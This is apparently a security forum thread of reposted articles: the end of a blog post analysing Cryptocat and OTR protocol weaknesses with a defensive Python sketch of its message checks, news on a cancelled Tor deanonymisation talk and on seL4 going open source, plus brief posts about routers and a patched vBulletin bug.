3. The decrypted plaintext is consistent with the 'tag'.

Roughly speaking, the idea here is to make sure that every user receives the same message. The use of a hashed plaintext is a bit ugly, but the argument here is that the random padding protects the message from guessing attacks. Make what you will of this.

Anti-replay. Cryptocat also seeks to prevent replay attacks, e.g., where an attacker manipulates a conversation by simply replaying (or reflecting) messages between users, so that users appear to be repeating statements. For example, consider the following chat transcripts:

[Image caption: Replays and reflection attacks.]

Replay attacks are prevented through the use of a global 'IV array' that stores all previously received and sent IVs to/from all users. If a duplicate IV arrives, Cryptocat will reject the message. This is unwieldy, but it generally seems adequate to prevent replays and reflections.

A limitation of this approach is that the IV array does not live forever. In fact, from time to time Cryptocat will reset the IV array without regenerating the client key. This means that if Alice and Bob both stay online, they can repeat the key exchange and wind up using the same key again -- which makes them both vulnerable to subsequent replays and reflections. (Update: this issue has since been fixed.)

In general the solution to these issues is threefold:

1. Keys shouldn't be long-term, but should be regenerated using new random components for each key exchange.
2. Different keys should be derived for the Alice->Bob and Bob->Alice directions.
3. It would be more elegant to use a message counter than this big, unwieldy IV array.

The good news is that the Cryptocat developers are working on a totally new version of the multi-party chat protocol that should be enormously better.

In conclusion

I said this would be a post that goes nowhere, and I delivered! But I have to admit, it helps to push it out of my system.

None of the issues I note above are the biggest deal in the world. They're all subtle issues, which illustrates two things: first, that crypto is hard to get right. But also: that crypto rarely fails catastrophically. The exciting crypto bugs that cause you real pain are still few and far between.

Notes:

* In practice, you might argue that the higher-level IM protocol already leaks user identities (e.g., Jabber nicknames). However this is very much an implementation choice. Moreover, even when using Jabber with known nicknames, you might access the Jabber server using one of several different clients (your computer, phone, etc.). Assuming you use Tor, the only indication of this might be the public key you use during OTR. So there's certainly useful information in this protocol.

** Notice that OTR signs a MAC instead of a hash of the user identity information. This happens to be a safe choice given that the MAC used is based on HMAC-SHA2, but it's not generally a safe choice. Swapping the HMAC out for a different MAC function (e.g., CBC-MAC) would be catastrophic.

*** To get specific, imagine I wanted to produce a simulated transcript for some conversation with Bob. Provided that Bob's client is online, I can send Bob any g^x value I want. It doesn't matter if he really wants to talk to me -- by default, his client will cheerfully send me back his own g^y and a signature on (g^x, g^y, pub_B, keyid_B), which, notably, does not include my identity. From this point on, all future authentication is performed using MACs and encrypted under keys that are known to both of us. There's nothing stopping me from faking the rest of the conversation.

**** Incidentally, a similar problem exists in the OTRv1 protocol.

Posted by Matthew Green at 9:31 AM

Sursa: A Few Thoughts on Cryptographic Engineering: Noodling about IM protocols
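[Editor's sketch] For concreteness, here is a stdlib-only Python sketch of the six send-side steps and three receive-side checks listed in the article, under stated assumptions: a SHA-512 counter keystream stands in for AES-CTR (the standard library has no AES), the per-pair encryption and MAC keys are assumed to have already been derived from the pairwise Diffie-Hellman secrets, and all function and variable names are mine, not Cryptocat's.

# Sketch of Cryptocat-style group message protection. The keystream XOR is
# a stand-in for AES-CTR; names and structure are illustrative only.
import hashlib, hmac, os

def keystream_xor(key, iv, data):
    # Stand-in cipher: SHA-512 counter-mode keystream XORed with the data.
    out, counter = b"", 0
    while len(out) < len(data):
        out += hashlib.sha512(key + iv + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, out))

def send_message(plaintext, pairwise_keys):
    # pairwise_keys: {user: (enc_key, mac_key)}, one pair per DH partner.
    padded = plaintext + os.urandom(64)            # step 1: random padding
    users = sorted(pairwise_keys)
    parts = {}
    for u in users:
        iv = os.urandom(12)                        # step 2: per-user IV
        parts[u] = (iv, keystream_xor(pairwise_keys[u][0], iv, padded))  # 3
    blob = b"".join(parts[u][0] + parts[u][1] for u in users)
    macs = {u: hmac.new(pairwise_keys[u][1], blob, hashlib.sha512).digest()
            for u in users}                        # step 4: HMAC of the blob
    # step 5: consistency tag over padded plaintext plus every HMAC
    tag = hashlib.sha512(padded + b"".join(macs[u] for u in users)).digest()
    return parts, macs, tag                        # step 6: broadcast all

def receive_message(me, my_keys, parts, macs, tag, users, seen_ivs):
    enc_key, mac_key = my_keys
    blob = b"".join(parts[u][0] + parts[u][1] for u in users)
    if not hmac.compare_digest(
            hmac.new(mac_key, blob, hashlib.sha512).digest(), macs[me]):
        raise ValueError("bad HMAC")               # check 1
    iv, ct = parts[me]
    if iv in seen_ivs:
        raise ValueError("replayed IV")            # check 2
    seen_ivs.add(iv)
    padded = keystream_xor(enc_key, iv, ct)
    expected = hashlib.sha512(
        padded + b"".join(macs[u] for u in users)).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("inconsistent message")   # check 3
    return padded[:-64]                            # strip the random padding

With two fake users sharing random key pairs, a round trip succeeds; flip any ciphertext byte and check 1 or check 3 fails. That failure mode is exactly the consistency property the article describes: every recipient can verify that everyone else was sent the same underlying plaintext.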
  22. Black Hat presentation on unmasking TOR users suddenly cancelled

Jeremy Kirk, IDG News Service

A presentation on a low-budget method to unmask users of the popular online privacy tool TOR will no longer go ahead at the Black Hat security conference early next month.

The talk was nixed by legal counsel at Carnegie Mellon's Software Engineering Institute after a finding that materials from researcher Alexander Volynkin were not approved for public release, according to a notice on the conference's website. It's rare but not unprecedented for Black Hat presentations to be cancelled. It was not clear why lawyers felt Volynkin's presentation should not proceed.

Volynkin, a research scientist with the university's Computer Emergency Response Team (CERT), was due to give a talk entitled "You Don't Have to be the NSA to Break Tor: Deanonymizing Users on a Budget" at the conference, which takes place Aug. 6-7 in Las Vegas.

TOR is short for The Onion Router, a network of distributed nodes that provide greater privacy by encrypting a person's browsing traffic and routing that traffic through random proxy servers. Although originally developed by the U.S. Naval Research Laboratory, it is now maintained by The TOR Project. TOR is widely used both by cybercriminals and by those with legitimate interests in preserving their anonymity, such as dissidents and journalists. Although TOR masks a computer's true IP address, advanced attacks have been developed that undermine its effectiveness.

Some of Volynkin's materials were informally shared with The TOR Project, the nonprofit group that oversees TOR, wrote Roger Dingledine, a co-founder of the organization, in a mailing list post on Monday. The TOR Project did not request that the talk be cancelled, Dingledine wrote. Also, the group has not received slides or descriptions of Volynkin's talk that go beyond the abstract that has now been deleted from Black Hat's website.

Dingledine wrote that The TOR Project is working with CERT on a coordinated disclosure of Volynkin's findings, possibly later this week. In general, the group encourages researchers to responsibly disclose information about new attacks. "Researchers who have told us about bugs in the past have found us pretty helpful in fixing issues and generally positive to work with," Dingledine wrote.

Sursa: Black Hat presentation on unmasking TOR users suddenly cancelled | PCWorld
  23. DARPA-derived secure microkernel goes open source tomorrow

Hacker-repelling, drone-protecting code will soon be yours to tweak as you see fit

By Darren Pauli, 28 Jul 2014

A nippy microkernel mathematically proven to be bug free*, and used to protect drones from hacking, will be released as open source tomorrow.

The formal-methods-based secure embedded L4 (seL4) microkernel was developed by Australian boffins at National ICT Australia (NICTA) and was part of the US Defense Advanced Research Projects Agency's High-Assurance Cyber Military Systems program, hatched in 2012 to stop hackers knocking unmanned birds out of the sky. It was noted as the most advanced and highly-assured member of the L4 microkernel family due to its use of formal methods that did not impact performance.

A microkernel differs from monolithic kernels – such as the Linux and Windows kernels – by running as much code as possible, from drivers to system services, in user space, making the whole thing more modular and (in theory) more stable.

Tomorrow at noon Eastern Australian Standard Time (GMT+10), seL4's entire source code, including proofs and additional code used to build trustworthy systems, will be released under the GPL v2 licence.

A global group of maths and aviation gurus from the likes of Boeing and Rockwell Collins joined a team of dedicated NICTA researchers on the project, which used the seL4 operating system as the basis of flight software designed to detect and foil hacking attempts.

NICTA senior researcher Dr June Andronick said the kernel should be considered by anyone building critical systems such as pacemakers and technology-rich cars. "If your software runs the seL4 kernel, you have a guarantee that if a fault happens in one part of the system it cannot propagate to the rest of the system and in particular the critical parts," Andronick said earlier this month. "We provide a formal mathematical proof that this seL4 kernel is correct and guarantees the isolation between components."

NICTA demonstrated in a video how a drone running the platform could detect hacking attempts from ground stations that would normally cause the flight software to die and the aircraft to crash. "What we are demonstrating here is that if one of the ground stations is malicious, and sends a command to the drone to stop the flight software, the commercially-available drone will accept the command, kill the software and just drop from the sky," Andronick said. The researchers' demo drone would instead detect the intrusion attempt, flash its LED lights and fly away. This could ensure that real drone missions continue in the event of hacking attempts by combatants.

Andronick said seL4 would come into play as the team added more functionality, including navigation, autonomous flight and mission control components.

In-depth information about seL4 is available on the NICTA website and in the paper Comprehensive Formal Verification of an OS Microkernel. ®

* That's bug free according to the formal verification of its specification; design flaws in the specs aren't counted by the team.

Sursa: DARPA-derived secure microkernel goes open source tomorrow • The Register
  24. I'll settle for this one: Asus RT-AC68U Dual-band Wireless-AC1900 Gigabit Router, USB 3.0, IEEE 802.11a/b/g/n - eMAG.ro

There's also the "cheerful guy": Router Wireless Linksys Smart Wi-Fi WRT1900AC, Dual Band, USB, AC1900 - eMAG.ro

But I prefer the ASUS. Too big a price difference. I'm curious how much it will cost. And how easily you can fry eggs next to it.
  25. Those are probably fixed. The exploit does NOT check whether the forum is vulnerable. If it shows this error on Home - vBulletin Community Forum, it means the bug was fixed.